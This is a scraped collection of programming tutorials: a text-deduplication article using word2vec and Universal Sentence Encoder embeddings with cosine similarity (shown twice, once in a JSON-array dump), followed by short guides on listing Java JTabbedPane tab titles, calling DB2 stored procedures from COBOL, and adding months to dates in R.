null, "e": 14503, "s": 14203, "text": "A better way of prediction is BEAM Search in which at each time step there is a choice provided for topmost probable tokens which have numbers equal to with BEAM Width and the total score for each of the predicted sequences is equal to the product of the probabilities for each word in the sequence." }, { "code": null, "e": 14613, "s": 14503, "text": "For this case study, I have taken the beam width equal to 3. For more insights, you can go through this blog." }, { "code": null, "e": 14716, "s": 14613, "text": "For this case study, I have tried a total of 12 models with certain variations. Below are the results." }, { "code": null, "e": 14867, "s": 14716, "text": "The results of the attention mechanism are better than the simple encoder-decoder and among the attention model, the performance does not differ much." }, { "code": null, "e": 14969, "s": 14867, "text": "We can also observe that the BLEU score for beam search is better than the greedy search as expected." }, { "code": null, "e": 15129, "s": 14969, "text": "I have done the Model Deployment for the Monotonic Attention model which is computing the score with the dot product. You can check out the model at this link." }, { "code": null, "e": 15190, "s": 15129, "text": "Some of the predictions for the above model are as follows :" }, { "code": null, "e": 15288, "s": 15190, "text": "For future work, I would love to work with other variations of the Monotonic Attention mechanism." 
}, { "code": null, "e": 15381, "s": 15288, "text": "If a better dataset is available publically that could really improve the model performance." }, { "code": null, "e": 15606, "s": 15381, "text": "I have tried to give a brief on the work I have done in this project. If you want to see the full detailed code where I have commented on each and every line, check out my Github repository. Feel free to connect on Linkedin." }, { "code": null, "e": 15721, "s": 15606, "text": "If you have reached it so far, help me to improve the content by leaving a comment. That would mean a lot to me :)" }, { "code": null, "e": 15822, "s": 15721, "text": "https://colinraffel.com/blog/online-and-linear-time-attention-by-enforcing-monotonic-alignments.html" }, { "code": null, "e": 15960, "s": 15822, "text": "Project under the guidance of Hina Sharma at Applied AI Course: https://www.appliedaicourse.com/course/11/Applied-Machine-learning-course" }, { "code": null, "e": 16020, "s": 15960, "text": "Loung Attention Paper: https://arxiv.org/pdf/1508.04025.pdf" }, { "code": null, "e": 16083, "s": 16020, "text": "Monotonic Attention Paper: https://arxiv.org/pdf/1409.0473.pdf" }, { "code": null, "e": 16222, "s": 16083, "text": "Implementation of Monotonic Attention: https://github.com/craffel/mad/blob/b3687a70615044359c8acc440e43a5e23dc58309/example_decoder.py#L22" } ]
Deduplication. Deduplication of text is an application... | by Abhijith C | Towards Data Science
deduplication /diːˌdjuːplɪˈkeɪʃ(ə)n/
noun: the elimination of duplicate or redundant information, especially in computer data. "deduplication removes the repetitive information before storing it"

As the definition says, the task we are trying to do is to remove duplicate texts/sentences and so on. This is nothing but the act of checking how similar the texts are to one another. They can be exactly identical, like "Deep Learning is Awesome!" and "Deep Learning is Awesome!". Or, they could be quite similar to one another in terms of what the sentence tries to convey, like "Deep Learning is Awesome!" and "Deep Learning is so cool". We know that these two sentences convey the same thing, and this is what we want our machines to capture.

Such a task in the literature is referred to as Semantic Text Similarity (STS). It deals with determining how similar two pieces of text are. This would include not just the syntactic similarity, that is, how similar or same the words used in the two sentences are, but also the semantic similarity that captures what is being conveyed by the two sentences, i.e. the meaning of the text plays an important role in determining what is similar and what is not.

The problem. Yes, that's our main goal. To solve the problem. Let me give you an example. Say you have to send really funny jokes (your joke could be a sentence or a bunch of sentences) to a group of people over e-mail (LOL!), and your boss asks you to make sure that people don't receive the same kind of jokes. So you have to make sure that all the jokes you have are unique and people don't get bored with the content. What a job, seriously?

You, being a kick-ass coder, decide to automate this task. You have this magical API that gives you a lot of jokes for free, and you write a script to mail the jokes to that group of people your boss loves. But we can't really trust this magical API, can we? It's magical. What if the API gives you similar jokes? You can't risk upsetting your boss. This is where you can use a deduplication engine that makes sure that no joke sent is similar to any that was sent in the past.

My primary aim here is not to talk a lot about these models, but to help you use them for a practical task, something like the one stated above. I admit that sending jokes to people in order to impress your boss isn't really practical.

Let's try to break this down into how this similarity measurement is defined and between what two entities we are trying to find the similarity (literally the text as is, or something else?).

Firstly, talking about the similarity measurement, there are quite a few that can be used. Just for the sake of completeness, listing a few:
1. Jaccard Similarity
2. Cosine Similarity
3. Earth Mover Distance
4. Jensen-Shannon distance

But to cut to the chase, we'll be using Cosine Similarity. Mathematically, cosine similarity is a measure of similarity between two (non-zero) vectors of an inner product space that measures the cosine of the angle between them. If two documents are similar but far apart in Euclidean space, they could still be pretty close to each other in terms of angle. This is captured by cosine distance, and hence it is advantageous.

Secondly, where do we use this cosine distance? Between pairs of sentence strings? Nope! This is where we use the power of Natural Language Processing and deep learning. We use vectors.
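To make the measure concrete, here is a minimal sketch (my addition, not from the original post) of cosine similarity between two small vectors, using NumPy:

import numpy as np

def cos_sim(a, b):
    # cosine of the angle between vectors a and b
    return np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))

a = np.array([1.0, 2.0, 3.0])
b = np.array([2.0, 4.0, 6.1])
print(cos_sim(a, b))  # close to 1.0: the two vectors point in almost the same direction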
A word/sentence vector is a row of real-valued numbers (as opposed to dummy numbers) where each point captures a dimension of the word's/sentence's meaning, and where semantically similar words/sentences have similar vectors.

And, again, there are plenty of methods to get these vectors. To name a few:
Word Embedding: word2vec, GloVe, BERT word embeddings, ELMo and so on.
Sentence Embedding: BERT sentence embedding, Universal Sentence Encoder, etc.

I'll jump straight into the methods that I personally experimented with and that worked beautifully for me: word2vec + Universal Sentence Encoder.

To prevent this from being a pure implementation-oriented article (which it is intended to be), I'll try to explain what these models are, very briefly.

word2vec comes in two variants: Skip-Gram and the Continuous Bag of Words model (CBOW). There's plenty of material on both these variants if you are looking for a detailed explanation, so I'll be very crisp here. The skip-gram model is a bit slower but usually does a better job with infrequent words. Hence, this is what is used often, and it is the one we'll talk briefly about.

You'll find this diagram in almost every word2vec (Skip-Gram model) blog and tutorial. In this architecture, the model uses the current word to predict the surrounding window of context words. It weighs the nearby context words more heavily than the distant context words. Here, we look at a window of context words (2 words on each side, in this case) and try to predict the center word.

Consider w(t) to be the input word; the usual dot product between the weight matrix and the input vector w(t) is done by the single hidden layer. We apply the softmax function to the dot product between the output vector of the hidden layer and the weight matrix. This gives us the probabilities of the words that appear in the context of w(t) at the current word location.

It's the vectors present in the hidden layer that become the vector representation of that word. But these are 'word' embeddings, and we have to find similar 'sentences'. So, how do we get the vector representation of the sentence instead of just word embeddings? One simple and trivial way (the one that I will show today) is by simply averaging the word embeddings of all the words of that sentence. Simple, isn't it?

Now for the main part, let's code this in.

import gensim
import numpy as np
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from tqdm import tqdm

# assumed stop-word list; the original snippet used stop_words without defining it
stop_words = set(stopwords.words('english'))

w2vmodel = gensim.models.KeyedVectors.load_word2vec_format(
    'models/GoogleNews-vectors-negative300.bin.gz', binary=True)

def sent2vec(s):
    '''Finding word2vec vector representation of sentences
    @param s : sentence
    '''
    words = str(s).lower()
    words = word_tokenize(words)
    words = [w for w in words if not w in stop_words]
    words = [w for w in words if w.isalpha()]
    featureVec = np.zeros((300,), dtype="float32")
    nwords = 0
    for w in words:
        try:
            # only count the word if it is actually in the vocabulary
            featureVec = np.add(featureVec, w2vmodel[w])
            nwords = nwords + 1
        except KeyError:
            continue
    # averaging
    if nwords > 0:
        featureVec = np.divide(featureVec, nwords)
    return featureVec

def get_w2v_vectors(list_text1, list_text2):
    '''Computing the word2vec vector representation of lists of sentences
    @param list_text1 : first list of sentences
    @param list_text2 : second list of sentences
    '''
    print("Computing first vectors...")
    text1_vectors = np.zeros((len(list_text1), 300))
    for i, q in tqdm(enumerate(list_text1)):
        text1_vectors[i, :] = sent2vec(q)
    text2_vectors = np.zeros((len(list_text2), 300))
    for i, q in tqdm(enumerate(list_text2)):
        text2_vectors[i, :] = sent2vec(q)
    return text1_vectors, text2_vectors

That's it! 🤷‍♂ You have your sentence embedding using word2vec.
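As a quick sanity check (my addition, reusing sent2vec from above together with SciPy's cosine distance), the two example sentences from earlier should come out as highly similar:

from scipy.spatial.distance import cosine

v1 = sent2vec("Deep Learning is Awesome!")
v2 = sent2vec("Deep Learning is so cool")
print(1 - cosine(v1, v2))  # cosine similarity; values near 1 mean very similar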
Google presented a series of models for encoding sentences into vectors. The authors have specifically targeted this for downstream tasks, i.e. for transfer learning tasks. STS is one such task.

It comes in two variants:
1. One with a Transformer Encoder
2. One with a Deep Averaging Network

Each of them has a different design goal:
1. Targets high accuracy at the cost of greater model complexity and resource consumption.
2. Targets efficient inference with slightly reduced accuracy.

I've hyperlinked both these architectures with my favorite blogs that explain each of them very well. Let's focus more on how to implement them.

import math
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub

BATCH_SIZE = 512  # assumed value; not specified in the original snippet

usemodel = hub.Module('models/sentence_encoder')

def get_use_vectors(list_text1, list_text2):
    '''Computing the USE vector representation of lists of sentences
    @param list_text1 : first list of sentences
    @param list_text2 : second list of sentences
    '''
    print("Computing second vectors...")
    messages1 = list_text1
    messages2 = list_text2
    num_batches = math.ceil(len(messages1) / BATCH_SIZE)
    # Reduce logging output.
    tf.logging.set_verbosity(tf.logging.ERROR)
    message_embeddings1 = []
    message_embeddings2 = []
    with tf.Session() as session:
        session.run([tf.global_variables_initializer(),
                     tf.tables_initializer()])
        for batch in range(num_batches):
            print(batch * BATCH_SIZE, batch * BATCH_SIZE + BATCH_SIZE)
            batch_msgs1 = messages1[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE]
            batch_msgs2 = messages2[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE]
            message_embeddings1_temp, message_embeddings2_temp = session.run(
                [usemodel(batch_msgs1), usemodel(batch_msgs2)])
            message_embeddings1.append(message_embeddings1_temp)
            message_embeddings2.append(message_embeddings2_temp)
    all_embedding1 = np.concatenate(tuple(message_embeddings1))
    all_embedding2 = np.concatenate(tuple(message_embeddings2))
    return all_embedding1, all_embedding2

Again, that's it! 🤷‍♂

Now we have the sentence embeddings for your jokes from two different models. Now we need the cosine similarities!

from scipy.spatial.distance import cosine

def cosine_similarity(list_vec1, list_vec2):
    '''Computing the cosine similarity between two lists of vectors
    @param list_vec1 : first list of vectors
    @param list_vec2 : second list of vectors
    '''
    cosine_dist = [cosine(x, y) for (x, y) in zip(np.nan_to_num(list_vec1),
                                                  np.nan_to_num(list_vec2))]
    cosine_sim = [(1 - dist) for dist in cosine_dist]
    return cosine_sim

When I was doing this job before you, I had a bunch of jokes that were non-duplicates and a few that were duplicates. Specifically, I had 385K non-duplicate pairs and 10K duplicate pairs. I plotted an AUC-ROC curve for this task using only the word2vec model.

Nice! The curve looks real nice. (I'm omitting the confusion matrices on purpose.)

TPR/Recall/Sensitivity: 77%
FPR: 2.2%

Let's see how the Universal Sentence Encoder fared. The area under the curve is slightly better, isn't it?

TPR/Recall/Sensitivity: 77%
FPR: 2.2%

Let's see what happens when we combine them. By combine, I mean averaging the cosine similarities from both approaches and checking the metrics: "an averaging ensemble of the models". Best one so far!

TPR/Recall/Sensitivity: 78.2%
FPR: 1.5%

Wohooo! 🎉🎉 We have a clear winner!

This is one quick way of finding duplicates. No training involved, just downloading existing brilliant models and using them for your STS task!
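For completeness, here is a short sketch of that averaging ensemble (my addition; jokes1 and jokes2 are illustrative names for two lists of sentences, and the functions are the ones defined above):

w2v_vecs1, w2v_vecs2 = get_w2v_vectors(jokes1, jokes2)
use_vecs1, use_vecs2 = get_use_vectors(jokes1, jokes2)

w2v_sims = cosine_similarity(w2v_vecs1, w2v_vecs2)
use_sims = cosine_similarity(use_vecs1, use_vecs2)

# element-wise average of the two similarity scores
ensemble_sims = [(a + b) / 2 for a, b in zip(w2v_sims, use_sims)]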
With this piece in place, you can easily build your deduplication engine. Just store all the jokes that you send to your boss's group on the first day, and then, for every new incoming joke, pair it up with all the previously seen jokes and use this ensemble model to find out whether it is a duplicate or not. If it is, throw it away. And in this way, keep your boss's friends happy, your boss happy, get a nice paycheck and keep yourself happy :)
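A minimal sketch of that loop (my addition; the 0.8 threshold, send_email helper and other names are illustrative, building on the functions defined earlier in this post):

SIM_THRESHOLD = 0.8  # assumed cutoff for calling two jokes duplicates

seen_jokes = []  # every joke already sent

def is_duplicate(new_joke):
    for old_joke in seen_jokes:
        w2v_a, w2v_b = get_w2v_vectors([new_joke], [old_joke])
        use_a, use_b = get_use_vectors([new_joke], [old_joke])
        sim = (cosine_similarity(w2v_a, w2v_b)[0] +
               cosine_similarity(use_a, use_b)[0]) / 2
        if sim > SIM_THRESHOLD:
            return True
    return False

def maybe_send(joke):
    # send a joke only if nothing similar has gone out before
    if not is_duplicate(joke):
        seen_jokes.append(joke)
        send_email(joke)  # hypothetical mailing helper, not defined here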
[ { "code": null, "e": 208, "s": 172, "text": "deduplication/diːˌdjuːplɪˈkeɪʃ(ə)n/" }, { "code": null, "e": 296, "s": 208, "text": "nounthe elimination of duplicate or redundant information, especially in computer data." }, { "code": null, "e": 365, "s": 296, "text": "\"deduplication removes the repetitive information before storing it\"" }, { "code": null, "e": 907, "s": 365, "text": "As the definition says, the task we are trying to do is to remove the duplicate texts/sentences and so on. This is nothing but the act of checking how similar the text is to one another. They can be exactly identical like: Deep Learning is Awesome! and Deep Learning is Awesome!. Or, they could be quite similar to one another in terms of what the sentence tries to convey, like: Deep Learning is Awesome! and Deep Learning is so cool. We know that these two sentences convey the same thing, and this is what we want our machines to capture." }, { "code": null, "e": 1389, "s": 907, "text": "Such a task in literature is referred to as Semantic Text Similarity(STS). It deals with determining how similar two pieces of texts are. This would include not just the syntactic similarity, that is how similar or same are the words that are used in the two sentence, but also the semantic similarity that captures the similarity in what is being conveyed using the two sentences, i.e the meaning of the text plays an important role in determining what is similar and not similar." }, { "code": null, "e": 1831, "s": 1389, "text": "The problem. Yes, that’s our main goal. To solve the problem. Let me give you an example. Say, you have to send really funny jokes (your joke could be a sentence or a bunch of sentences) to a group of people over e-mail (LOL!), and your boss asks you to make sure that people don’t receive same kind of jokes. So you have to make sure that all the jokes you have are unique and people don’t get bored with the content. What a job, seriously?" }, { "code": null, "e": 2308, "s": 1831, "text": "You, being a kick-ass coder, decide to automate this task. You have this magical API that gives you a lot of jokes for free and you write a script to mail the jokes to that group of people your boss loves. But, we can’t really trust this magical API, can we? It’s magical. What if the API gives you similar jokes? You can’t risk upsetting your boss.This is where you can use a deduplication engine that makes sure that no joke sent is similar to any that was sent in the past." }, { "code": null, "e": 2552, "s": 2308, "text": "My primary aim here is not to talk a lot about these models. But to help you use them for a practical task, something like the one that is stated above. I admit that sending jokes to people in order to impress your boss isn’t really practical." }, { "code": null, "e": 2744, "s": 2552, "text": "Let’s try to break this down into how this similarity measurement is defined and between what two entities we are trying to find the similarity (literally the text as is, or something else?)." }, { "code": null, "e": 2973, "s": 2744, "text": "Firstly, talking about the similarity measurement, there’s quite a few that can be used. Just for the sake of completeness, listing a few:1. Jaccard Similarity2. Cosine Similarity3. Earth Mover Distance4. Jensen-Shannon distance" }, { "code": null, "e": 3202, "s": 2973, "text": "But to cut to the chase, we’ll be using Cosine Similarity. 
Mathematically, Cosine similarity is a measure of similarity between two vectors (non-zero) of an inner product space that measures the cosine of the angle between them." }, { "code": null, "e": 3392, "s": 3202, "text": "If two documents are similar and if they are far apart in the Euclidean space, they could still be pretty close to each other. This is captured by cosine distance and hence is advantageous." }, { "code": null, "e": 3577, "s": 3392, "text": "Secondly, where do we use this cosine distance? Between pairs of sentence strings? Nope! This is were we use the power of Natural Language Processing and Deep learning. We use vectors." }, { "code": null, "e": 3802, "s": 3577, "text": "A word/sentence vector is a row of real valued numbers (as opposed to dummy numbers) where each point captures a dimension of the word’s/sentence’s meaning and where semantically similar words/sentences have similar vectors." }, { "code": null, "e": 4026, "s": 3802, "text": "And, again, there are plenty of methods to get these vectors. To name a few:Word Embedding: word2vec, GloVe, BERT word embeddings, ELMo and so on.Sentence Embedding: BERT sentence embedding, Universal Sentence Encoder, etc." }, { "code": null, "e": 4134, "s": 4026, "text": "I’ll jump straight into the methods that I personally experimented with and that worked beautifully for me." }, { "code": null, "e": 4187, "s": 4134, "text": " word2vec + Universal Sentence Encoder" }, { "code": null, "e": 4340, "s": 4187, "text": "To prevent this from being a pure implementation-oriented article (which it is intended to be), I’ll try to explain what these models are, very briefly." }, { "code": null, "e": 4702, "s": 4340, "text": "word2vec comes in two variants: Skip-Gram and Continuous Bag of Words model (CBOW). There’s plenty of material on both these variants, if you are looking for a detailed explanation. I’ll be very crisp here. The skip-gram model is a bit slower but usually does a better job with infrequent words. Hence, this is what is used often. We’ll talk briefly about this." }, { "code": null, "e": 4975, "s": 4702, "text": "You’ll find this diagram in almost every word2vec (Skip-Gram model) blog and tutorial. In this architecture, the model uses the current word to predict the surrounding window of context words. It weighs the nearby context words more heavily than the distant context words." }, { "code": null, "e": 5091, "s": 4975, "text": "Here, we look at a window of context words (2 words on each side, in this case) and try to predict the center word." }, { "code": null, "e": 5462, "s": 5091, "text": "Consider w(t) is the input word, the usual dot product between the weight matrix and the input vector w(t) is done by the single hidden layer. We apply the softmax function to the dot product between the output vector of the hidden layer and the weight matrix. This gives us the probabilities of the words that appear in the context of w(t) at the current word location." }, { "code": null, "e": 5734, "s": 5462, "text": "It’s the vectors that are present in the hidden layers that become the vector representation of that word. But these are ‘word’ embedding, and we have to find similar ‘sentences’. So, how do we get the vector representation of the sentence instead of just word embedding?" }, { "code": null, "e": 5889, "s": 5734, "text": "One simple and trivial way (the one that I will show today) is by simply averaging the word embedding of all the words of that sentence. Simple, isn’t it?" 
}, { "code": null, "e": 5932, "s": 5889, "text": "Now for the main part, let’s code this in." }, { "code": null, "e": 7663, "s": 5932, "text": "w2vmodel = gensim.models.KeyedVectors.load_word2vec_format('models/GoogleNews-vectors-negative300.bin.gz'), binary=True)def sent2vec(s): '''Finding word2vec vector representation of sentences @param s : sentence ''' words = str(s).lower() words = word_tokenize(words) words = [w for w in words if not w in stop_words] words = [w for w in words if w.isalpha()] featureVec = np.zeros((300,), dtype=\"float32\") nwords = 0 for w in words: try: nwords = nwords + 1 featureVec = np.add(featureVec, w2vmodel[w]) except: continue # averaging if nwords > 0: featureVec = np.divide(featureVec, nwords) return featureVecdef get_w2v_vectors(list_text1, list_text2): ‘’’Computing the word2vec vector representation of list of sentences@param list_text1 : first list of sentences@param list_text2 : second list of sentences ‘’’ print(“Computing first vectors...”) text1_vectors = np.zeros((len(list_text1), 300)) for i, q in tqdm(enumerate(list_text1)): text1_vectors[i, :] = sent2vec(q) text2_vectors = np.zeros((len(list_text2), 300)) for i, q in tqdm(enumerate(list_text2)): text2_vectors[i, :] = sent2vec(q) return text1_vectors, text2_vectors" }, { "code": null, "e": 7727, "s": 7663, "text": "That’s it! 🤷‍♂ You have your sentence embedding using word2vec." }, { "code": null, "e": 7921, "s": 7727, "text": "Google presented a series of models for encoding sentences into vectors. The authors have specifically targeted this for downstream tasks, i.e for transfer learning tasks. STS is one such task." }, { "code": null, "e": 8016, "s": 7921, "text": "It comes in two variants:1. One with a Transformer Encoder2. One with a Deep Averaging Network" }, { "code": null, "e": 8210, "s": 8016, "text": "Each of them have different design goals:1. Targets high accuracy at the cost of greater model complexity and resource consumption.2. Targets efficient inference with slightly reduced accuracy." }, { "code": null, "e": 8355, "s": 8210, "text": "I’ve hyperlinked both these architectures with my favorite blogs that explain each of them very well. Let’s focus more on how to implement them." }, { "code": null, "e": 9751, "s": 8355, "text": "usemodel = hub.Module('models/sentence_encoder')def get_use_vectors(list_text1, list_text2):'''Computing the USE vector representation of list of sentences@param list_text1 : first list of sentences@param list_text2 : second list of sentences ''' print(\"Computing second vectors...\") messages1 = list_text1 messages2 = list_text2 num_batches = math.ceil(len(messages1) / BATCH_SIZE) # Reduce logging output. 
tf.logging.set_verbosity(tf.logging.ERROR) message_embeddings1 = [] message_embeddings2 = [] with tf.Session() as session: session.run([tf.global_variables_initializer(), tf.tables_initializer()]) for batch in range(num_batches): print(batch * BATCH_SIZE, batch * BATCH_SIZE + BATCH_SIZE) batch_msgs1 = messages1[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE] batch_msgs2 = messages2[batch * BATCH_SIZE: batch * BATCH_SIZE + BATCH_SIZE] message_embeddings1_temp, message_embeddings2_temp = session.run([usemodel(batch_msgs1), usemodel(batch_msgs2)]) message_embeddings1.append(message_embeddings1_temp) message_embeddings2.append(message_embeddings2_temp) all_embedding1 = np.concatenate(tuple(message_embeddings1)) all_embedding2 = np.concatenate(tuple(message_embeddings2)) return all_embedding1, all_embedding2" }, { "code": null, "e": 9773, "s": 9751, "text": "Again, that’s it! 🤷‍♂" }, { "code": null, "e": 9850, "s": 9773, "text": "Now we have the sentence embedding for your jokes from two different models." }, { "code": null, "e": 9887, "s": 9850, "text": "Now we need the cosine similarities!" }, { "code": null, "e": 10275, "s": 9887, "text": "def cosine_similarity(list_vec1, list_vec2):'''Computing the cosine similarity between two vector representation@param list_text1 : first list of sentences@param list_text2 : second list of sentences ''' cosine_dist = [cosine(x, y) for (x, y) in zip(np.nan_to_num(list_vec1), np.nan_to_num(list_vec2))] cosine_sim = [(1 - dist) for dist in cosine_dist] return cosine_sim" }, { "code": null, "e": 10527, "s": 10275, "text": "When I was doing this job before you, I had a bunch of jokes that were non-duplicates and few that were duplicates. Specifically, I had 385K non-duplicate pairs and 10K duplicate pairs. I plotted an AUC-ROC for this task using only the word2vec model." }, { "code": null, "e": 10610, "s": 10527, "text": "Nice! The curve looks real nice. (I’m omitting the confusion matrices on purpose)." }, { "code": null, "e": 10647, "s": 10610, "text": "TPR/Recall/Sensitivity: 77%FPR: 2.2%" }, { "code": null, "e": 10699, "s": 10647, "text": "Let’s see how the Universal Sentence Encoder fared." }, { "code": null, "e": 10754, "s": 10699, "text": "The area under the curve is slightly better, isn’t it?" }, { "code": null, "e": 10791, "s": 10754, "text": "TPR/Recall/Sensitivity: 77%FPR: 2.2%" }, { "code": null, "e": 10981, "s": 10791, "text": "Let’s see what happens when we combine them. By combine what I mean is average the cosine similarities from both the approaches and check the metrics. “An averaging ensemble of the models”." }, { "code": null, "e": 10998, "s": 10981, "text": "Best one so far!" }, { "code": null, "e": 11037, "s": 10998, "text": "TPR/Recall/Sensitivity: 78.2%FPR: 1.5%" }, { "code": null, "e": 11072, "s": 11037, "text": "Wohooo! 🎉🎉 We have a clear winner!" }, { "code": null, "e": 11216, "s": 11072, "text": "This is one quick way of finding duplicates. No training involved, just downloading existing brilliant models and using them for your STS task!" }, { "code": null, "e": 11555, "s": 11216, "text": "With this piece in place, you can easily build your deduplication engine. Just store all the jokes that you send to your boss’s group on the first day and then for every new incoming joke, pair them up with all the previously seen jokes and use this ensemble model to find whether they are duplicates or not. If they are, throw them away." } ]
Display all the titles of JTabbedPane tabs on Console in Java
To display all the titles of the JTabbedPane, let us first get the count of tabs −

int count = tabbedPane.getTabCount();

Now, loop through the number of tabs in the JTabbedPane. Use getTitleAt() to get the title of each and every tab −

for (int i = 0; i < count; i++) {
   String str = tabbedPane.getTitleAt(i);
   System.out.println(str);
}

The following is an example to display all the titles of JTabbedPane tabs on the console −

package my;
import javax.swing.*;
import java.awt.*;
public class SwingDemo {
   public static void main(String args[]) {
      JFrame frame = new JFrame("Devices");
      JTabbedPane tabbedPane = new JTabbedPane();
      JTextArea text = new JTextArea(100,100);
      JPanel panel1, panel2, panel3, panel4, panel5, panel6, panel7, panel8;
      panel1 = new JPanel();
      panel2 = new JPanel();
      panel2.add(text);
      panel3 = new JPanel();
      panel4 = new JPanel();
      panel5 = new JPanel();
      panel6 = new JPanel();
      panel7 = new JPanel();
      panel8 = new JPanel();
      tabbedPane.setBackground(Color.blue);
      tabbedPane.setForeground(Color.white);
      tabbedPane.addTab("Laptop", panel1);
      tabbedPane.addTab("Desktop ", panel2);
      tabbedPane.addTab("Notebook", panel3);
      tabbedPane.addTab("Echo ", panel4);
      tabbedPane.addTab("Tablet", panel5);
      tabbedPane.addTab("Alexa ", panel6);
      tabbedPane.addTab("Notebook", panel7);
      tabbedPane.addTab("iPad", panel8);
      int count = tabbedPane.getTabCount();
      for (int i = 0; i < count; i++) {
         String str = tabbedPane.getTitleAt(i);
         System.out.println(str);
      }
      frame.add(tabbedPane);
      frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
      frame.setSize(600,350);
      frame.setVisible(true);
   }
}

On running, the console will display all the titles of the tabs −
[ { "code": null, "e": 1145, "s": 1062, "text": "To display all the titles of the JTabbedPane, let us first get the count of tabs −" }, { "code": null, "e": 1183, "s": 1145, "text": "int count = tabbedPane.getTabCount();" }, { "code": null, "e": 1302, "s": 1183, "text": "Now, loop through the number of tabs in the JTabbedPane. Use the getTitleAt() to get the title of each and every tab −" }, { "code": null, "e": 1408, "s": 1302, "text": "for (int i = 0; i < count; i++) {\n String str = tabbedPane.getTitleAt(i);\n System.out.println(str);\n}" }, { "code": null, "e": 1495, "s": 1408, "text": "The following is an example to display all the titles of JTabbedPane tabs on Console −" }, { "code": null, "e": 2857, "s": 1495, "text": "package my;\nimport javax.swing.*;\nimport java.awt.*;\npublic class SwingDemo {\n public static void main(String args[]) {\n JFrame frame = new JFrame(\"Devices\");\n JTabbedPane tabbedPane = new JTabbedPane();\n JTextArea text = new JTextArea(100,100);\n JPanel panel1, panel2, panel3, panel4, panel5, panel6, panel7, panel8;\n panel1 = new JPanel();\n panel2 = new JPanel();\n panel2.add(text);\n panel3 = new JPanel();\n panel4 = new JPanel();\n panel5 = new JPanel();\n panel6 = new JPanel();\n panel7 = new JPanel();\n panel8 = new JPanel();\n tabbedPane.setBackground(Color.blue);\n tabbedPane.setForeground(Color.white);\n tabbedPane.addTab(\"Laptop\", panel1);\n tabbedPane.addTab(\"Desktop \", panel2);\n tabbedPane.addTab(\"Notebook\", panel3);\n tabbedPane.addTab(\"Echo \", panel4);\n tabbedPane.addTab(\"Tablet\", panel5);\n tabbedPane.addTab(\"Alexa \", panel6);\n tabbedPane.addTab(\"Notebook\", panel7);\n tabbedPane.addTab(\"iPad\", panel8);\n int count = tabbedPane.getTabCount();\n for (int i = 0; i < count; i++) {\n String str = tabbedPane.getTitleAt(i);\n System.out.println(str);\n }\n frame.add(tabbedPane);\n frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);\n frame.setSize(600,350);\n frame.setVisible(true);\n }\n}" }, { "code": null, "e": 2924, "s": 2857, "text": "On runnting, the console will display all the values of the tabs −" } ]
How can a COBOL-DB2 program call a STORED PROCEDURE? Give an example.
A STORED PROCEDURE generally contains the SQLs which are often used in one or more programs. The main advantage of a STORED PROCEDURE is that it reduces the data traffic between COBOL and DB2, as the STORED PROCEDURE resides in DB2.

A COBOL-DB2 program can call a STORED PROCEDURE using a CALL statement, and we can have nested STORED PROCEDUREs up to 16 levels. For example, if we have a STORED PROCEDURE with the name ORDERSTAT, then we can call it in our COBOL-DB2 program using the below command:

EXEC SQL
   CALL ORDERSTAT (:WS-ORDER-ID, :WS-ORDER-STATUS)
END-EXEC

In order to create a DB2 procedure, we can give a definition as below.

CREATE PROCEDURE ORDERSTAT (IN ORDERID INT,
                            OUT ORDERSTAT CHAR)

We can define the body of the STORED PROCEDURE as below.

LANGUAGE SQL
PROCA: BEGIN
   SELECT ORDER_STAT
     INTO ORDERSTAT
     FROM ORDERS
    WHERE ORDER_ID = ORDERID;
END PROCA

Below are some of the advantages of using a STORED PROCEDURE.

The core logic and algorithm are stored centrally in DB2 and managed by the DBMS. This helps reusability, and modifications need to be made at only a single central location.

Access to stored procedures can be restricted based on the permissions set for different profiles within DB2.

The logic is executed at the database server, which reduces the traffic on the DB2 network and hence decreases the overall execution time.
[ { "code": null, "e": 1297, "s": 1062, "text": "A STORED PROCEDURE generally contains the SQLs which are often used in one or more programs. The main advantage of STORED PROCEDURE is that it reduces the data traffic between the COBOL and DB2 as the STORED PROCEDURES resides in DB2." }, { "code": null, "e": 1558, "s": 1297, "text": "A COBOL-DB2 program can call a STORED PROCEDURE using a CALL statement and we can have nested STORED PROCEDURE upto 16 levels. For example, if we have STORED PROCEDURE with a name ORDERSTAT, then we can call it in our COBOL-DB2 program using the below command:" }, { "code": null, "e": 1627, "s": 1558, "text": "EXEC SQL\n CALL ORDERSTAT (:WS-ORDER-ID, :WS-ORDER-STATUS)\nEND-EXEC" }, { "code": null, "e": 1696, "s": 1627, "text": "In order to create a DB2 procedure, we can give definition as below." }, { "code": null, "e": 1763, "s": 1696, "text": "CREATE PROCEDURE ORDERSTAT ( IN ORDER-ID int,\nOUT ORDER-STAT char)" }, { "code": null, "e": 1808, "s": 1763, "text": "We can define the STORED PROCEDURE as below." }, { "code": null, "e": 1921, "s": 1808, "text": "LANGUAGE SQL\nPROCA: BEGIN\nDECLARE ORDERID int;\nSELECT ORDER_STAT FROM ORDERS\n WHERE ORDER_ID = ORDERID;\nEND P1" }, { "code": null, "e": 1981, "s": 1921, "text": "Below are some of the advantages of using STORED PROCEDURE." }, { "code": null, "e": 2156, "s": 1981, "text": "The core logic and algorithm is stored centrally at DB2 and managed by DBMS. This helps in the reusability and saves effort of modification at only a single central location." }, { "code": null, "e": 2274, "s": 2156, "text": "The access to the stored procedures can be restricted based on the permissions set for different profiles within DB2." }, { "code": null, "e": 2409, "s": 2274, "text": "The logic is executed at the database server which reduces the traffic at DB2 network and hence decreasing the overall execution time." } ]
How to add a month to a date in R?
We often have to deal with date data in time series analysis, and sometimes a data set contains a recorded time variable that we need for other types of analysis. Depending on our objective, we need to process the data and convert the time variable into the appropriate form. If we want to create a sequence of months from date data, we can do it by adding months to a starting date. This can be easily done by using the AddMonths function of the DescTools package.

Installing the DescTools package −

install.packages("DescTools")

Loading the DescTools package −

library(DescTools)

AddMonths(as.Date('2020/01/31'), 1)
[1] "2020-02-29"
AddMonths(as.Date('2020/01/31'), 2)
[1] "2020-03-31"
AddMonths(as.Date('2020/01/31'), 3)
[1] "2020-04-30"
AddMonths(as.Date('2020/01/31'), 4)
[1] "2020-05-31"
AddMonths(as.Date('2020/01/31'), 6)
[1] "2020-07-31"
